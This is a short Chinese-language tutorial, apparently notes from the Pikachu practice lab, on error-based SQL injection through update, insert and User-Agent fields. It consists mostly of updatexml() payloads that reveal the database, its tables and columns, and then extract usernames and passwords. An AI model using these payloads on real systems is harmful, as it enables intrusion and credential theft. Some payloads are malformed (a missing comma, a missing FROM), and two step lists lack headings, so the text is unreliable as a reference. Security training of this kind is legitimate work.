SQL注入之常見注入的步驟

update注入 (在修改資訊的時候，後台就是通過update去找操作的)

insert注入(insert 注入是指我們前端註冊的資訊，後台就是通過

insert這個操作插入到資料庫中)

①在註冊資訊處抓包

②insert判斷注入：單引號報錯存在注入，報錯資訊為』1234』),'1』1』1』1)

③基於報錯資訊進行注入，構造payload

爆資料庫：1234』 or updatexml(1,concat(0x7e,(select database()),0x7e),1)or』

④爆資料表：1234』 or updatexml(1,concat(0x7e(select table_name from information_schema.tables where table_schema=『pikachu』),0x7e),1)or』

⑤爆資料列：1234』 or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=『users』 limit 0,1),0x7e),1)or』

⑥爆使用者名稱密碼：1234』 or updatexml(1,concat(0x7e,(select concat (username,0x7e,password)from users limit 0,1),0x7e),1)or』

①判斷注入：單引號報錯存在注入

②爆資料庫：56 or updatexml(1,concat(0x7e,(select database()),0x7e),1)

③爆資料表：56 or updatexml(1,concat(0x7e,(select table_name information_schema.tables where table_schema=『pikachu』 limit 0,1),0x7e),1)or』

④爆資料列：56 or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=『users』 limit 0,1),0x7e),1)

⑤爆使用者名稱密碼字段：56 or updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users limit 0,1),0x7e),1)

①判斷注入：登入後抓包修改user-agent為單引號報錯

②爆資料庫：'or updatexml(1,concat(0x7e,(select database()),0x7e),1) or 』

③報資料表:』 or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=『pikachu』 limit 0,1),0x7e),1) or 』

④爆資料列:』 or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=『users』 limit 0,1),0x7e),1) or』

⑤爆使用者名稱密碼字段:1234』 or updatexml(1,concat(0x7e,(select concat(username,0x7e,password)from users limit 0,1),0x7e),1) or』